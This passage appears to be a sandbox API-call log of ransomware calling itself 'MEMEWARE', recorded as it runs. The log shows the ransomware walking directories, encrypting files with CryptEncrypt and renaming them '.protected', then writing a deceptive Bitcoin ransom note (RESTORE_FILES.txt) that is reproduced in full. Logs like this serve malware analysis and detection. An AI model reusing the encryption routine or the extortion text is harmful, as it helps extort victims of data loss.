pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned 75 [0055.393] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0055.393] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0055.393] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*") returned 77 [0055.393] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0055.393] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0055.394] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0055.394] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0055.394] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0055.394] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0055.394] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\.") returned 77 [0055.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.394] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.394] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0055.394] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0055.394] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0055.394] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0055.394] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0055.394] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\..") returned 78 [0055.394] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.394] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.394] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files") returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files (x86)") returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0055.394] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.394] StrStrIW (lpFirst="Proof.cab", lpSrch=".protected") returned 0x0 [0055.394] lstrcmpW (lpString1="Proof.cab", lpString2="RESTORE_FILES.txt") returned -1 [0055.394] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.394] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.394] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.395] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.395] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0055.395] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.395] StrStrW (lpFirst="Proof.cab", lpSrch=".rar") returned 0x0 [0055.395] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.395] StrStrW (lpFirst="Proof.cab", lpSrch=".zip") returned 0x0 [0055.395] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.408] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.408] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.408] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.408] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.420] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.420] CloseHandle (hObject=0x150) returned 1 [0055.752] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.protected") returned 95 [0055.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.protected")) returned 1 [0055.752] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files") returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files (x86)") returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0055.753] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.753] StrStrIW (lpFirst="Proof.msi", lpSrch=".protected") returned 0x0 [0055.753] lstrcmpW (lpString1="Proof.msi", lpString2="RESTORE_FILES.txt") returned -1 [0055.753] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.753] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.753] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.754] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0055.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.754] StrStrW (lpFirst="Proof.msi", lpSrch=".rar") returned 0x0 [0055.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.754] StrStrW (lpFirst="Proof.msi", lpSrch=".zip") returned 0x0 [0055.754] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.796] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.796] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.797] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.797] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.834] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.834] CloseHandle (hObject=0x150) returned 1 [0056.029] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.protected") returned 95 [0056.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.protected")) returned 1 [0056.029] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files") returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files (x86)") returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0056.029] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.029] StrStrIW (lpFirst="Proof.xml", lpSrch=".protected") returned 0x0 [0056.029] lstrcmpW (lpString1="Proof.xml", lpString2="RESTORE_FILES.txt") returned -1 [0056.029] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0056.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0056.030] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0056.030] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.030] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0056.030] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.030] StrStrW (lpFirst="Proof.xml", lpSrch=".rar") returned 0x0 [0056.030] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.030] StrStrW (lpFirst="Proof.xml", lpSrch=".zip") returned 0x0 [0056.030] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x5b2, lpOverlapped=0x0) returned 1 [0056.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.046] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x5b2, lpOverlapped=0x0) returned 1 [0056.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.046] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0056.046] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0056.046] CloseHandle (hObject=0x150) returned 1 [0056.048] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.protected") returned 95 [0056.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.protected")) returned 1 [0056.050] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0056.050] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0056.050] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\RESTORE_FILES.txt") returned 93 [0056.050] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.050] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0056.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0056.051] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0056.051] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0056.051] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0056.051] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0056.051] CloseHandle (hObject=0xb4) returned 1 [0056.052] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="Windows") returned -1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="Program Files") returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="Program Files (x86)") returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="$Recycle.bin") returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="System Volume Information") returned -1 [0056.052] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.052] StrStrIW (lpFirst="Proofing.msi", lpSrch=".protected") returned 0x0 [0056.052] lstrcmpW (lpString1="Proofing.msi", lpString2="RESTORE_FILES.txt") returned -1 [0056.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.052] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.052] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.053] StrStrW (lpFirst="Proofing.msi", lpSrch=".txt") returned 0x0 [0056.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.053] StrStrW (lpFirst="Proofing.msi", lpSrch=".rar") returned 0x0 [0056.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.053] StrStrW (lpFirst="Proofing.msi", lpSrch=".zip") returned 0x0 [0056.053] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.062] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.062] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.063] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.063] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.112] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.112] CloseHandle (hObject=0xb4) returned 1 [0056.129] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.protected") returned 89 [0056.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.protected")) returned 1 [0056.130] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="Windows") returned -1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="Program Files") returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="Program Files (x86)") returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="$Recycle.bin") returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="System Volume Information") returned -1 [0056.130] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.130] StrStrIW (lpFirst="Proofing.xml", lpSrch=".protected") returned 0x0 [0056.130] lstrcmpW (lpString1="Proofing.xml", lpString2="RESTORE_FILES.txt") returned -1 [0056.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.131] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.131] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.131] StrStrW (lpFirst="Proofing.xml", lpSrch=".txt") returned 0x0 [0056.131] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.131] StrStrW (lpFirst="Proofing.xml", lpSrch=".rar") returned 0x0 [0056.131] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 